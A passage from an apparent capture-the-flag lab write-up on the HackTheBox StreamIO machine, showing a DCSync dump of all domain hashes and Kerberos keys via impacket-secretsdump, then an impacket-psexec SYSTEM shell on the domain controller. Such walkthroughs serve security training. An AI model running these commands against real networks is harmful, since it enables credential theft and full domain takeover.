DCSync Attack

The credential of the administrator user has been validated upon abusing the ReadLAPSPassword privilege leveraging the dcsync privileges of the administrator user, I can dump the entire domain credentials

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=administrator@dc.streamio.htb.ccache impacket-secretsdump streamio.htb/@dc.streamio.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] target system bootkey: 0x4dbf07084a530cfa7ab417236bd4a647
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:6a559f691b75bff16a07ecbd12e3bdfb:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
streamio\dc$:plain_password_hex:37ed1c56c56cdd221cb0ddffb91994f512bada6e267addf34b56cc0dab23d0a8bdd3d3ceca8b6f6bdd15063d343043044121f902fb30dbf42c70da71ec05d7b656f384f7bfbedae35cdce0b46b3e367be311d3824827b7c208f56027345c31076bc8be714751d5b0f5a149e900169bb54f9607822c0e351a1834f8b31ef9595690b7167a2c1237fc18f5c7fff36088413745b639062ae39669dda8ad458c1c4b52ab4e346debad306d6fbdc629db6bad7f91bd5a9725980ed8f7e34fc02c0b1df0ff2024637f15d339acfaaf391e9144f65d60bd8841c7c04beb472b074b7470cc396dcf09423ecd0bdb414b9ccf80c9
streamio\dc$:aad3b435b51404eeaad3b435b51404ee:2e6c84140f7b3588f04b1e5f9a3737b3:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xd8b78bca07d4bce21bce1ae04bf231978c84407f
dpapi_userkey:0x9b682d0f5f9b63c03827113581bc2dc4f993e3ee
[*] NL$KM 
 0000   a5 68 6c 6f 0f d6 72 8f  9e de a2 27 47 d1 73 3a   .hlo..r....'g.s:
 0010   EA FB 23 4A 58 C9 04 91  95 A2 E7 3C 63 1A E8 B1   ..#JX......<c...
 0020   DA D8 C8 95 DD 09 23 97  A5 5A 21 74 17 17 CC C6   ......#..Z!t....
 0030   5E 1B F7 BE 34 99 DC 39  D1 72 7B 3E 19 B6 B2 3C   ^...4..9.r{>...<
nl$km:a5686c6f0fd6728f9edea22747d1733aeafb234a58c9049195a2e73c631ae8b1dad8c895dd092397a55a21741717ccc65e1bf7be3499dc39d1727b3e19b6b23c
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:9f946b799913b6314553790f5c314496:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
jdgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
dc$:1000:aad3b435b51404eeaad3b435b51404ee:2e6c84140f7b3588f04b1e5f9a3737b3:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:d2c8874a503366044996ed177fbeb03025aec56edfa096349c0360f1395b5562
administrator:aes128-cts-hmac-sha1-96:1163ca485f82e2291eccd9ba72ad30e3
administrator:des-cbc-md5:3d3e9eba254652c7
krbtgt:aes256-cts-hmac-sha1-96:668ee76d84bf5ea1e845933ace27ecde98b736f218c0830cbe71e18812166cda
krbtgt:aes128-cts-hmac-sha1-96:f91f8540a9aca4af627959d1cb888f13
krbtgt:des-cbc-md5:d032029279fbc4fd
jdgodd:aes256-cts-hmac-sha1-96:53fcc54b04d560253b0fdb259b9de0da8c5c65916d12b5e4b5dd4723d9003443
jdgodd:aes128-cts-hmac-sha1-96:22e9e5268e40d1fc8198415fdd6c64bd
jdgodd:des-cbc-md5:76d0fe1a231934e5
martin:aes256-cts-hmac-sha1-96:d5eed6cafcabd393a2101f4fadc143344c48ebaacb065490510ef608424065f0
martin:aes128-cts-hmac-sha1-96:0a0cff37d02d1299a24fe58debb20392
martin:des-cbc-md5:570bfd51e9f7e3bf
nikk37:aes256-cts-hmac-sha1-96:d4a44efe5740231cad3da85c294b01678840ac7a5b6207f366c36fc3c5b59347
nikk37:aes128-cts-hmac-sha1-96:eaff7bb14b5c41f80e5216cb09e16435
nikk37:des-cbc-md5:ae5ddf8fc2853e67
yoshihide:aes256-cts-hmac-sha1-96:0849b8c4eaee4edeaed2972752529251bbb616e9f24e08992923b4f18e9d73b0
yoshihide:aes128-cts-hmac-sha1-96:d668308ea96ebda1d31e3bb77b8e6768
yoshihide:des-cbc-md5:3bae5257ea029d61
dc$:aes256-cts-hmac-sha1-96:9872eef676a44be33d7e08fc77153ab88ab94982ad273d09352f642077da1207
dc$:aes128-cts-hmac-sha1-96:58a31d63174ca1f447ce5279bbe634bd
dc$:des-cbc-md5:a7155b26c48afd0d
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shell Drop

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=administrator@dc.streamio.htb.ccache impacket-psexec streamio.htb/@dc.streamio.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on dc.streamio.htb.....
[*] Found writable share ADMIN$
[*] Uploading file AFkUXUGh.exe
[*] Opening SVCManager on dc.streamio.htb.....
[*] Creating service CgNB on dc.streamio.htb.....
[*] Starting service CgNB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::243
   IPv6 Address. . . . . . . . . . . : dead:beef::59b8:1082:6853:8e9
   Link-local IPv6 Address . . . . . : fe80::59b8:1082:6853:8e9%12
   IPv4 Address. . . . . . . . . . . : 10.10.11.158
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
                                       10.10.10.2

System Level Compromise

InfoSec LAB

Explorer

StreamIO_Privilege_Escalation

DCSync Attack

Shell Drop

Interactive Graph View

Table of Contents

Backlinks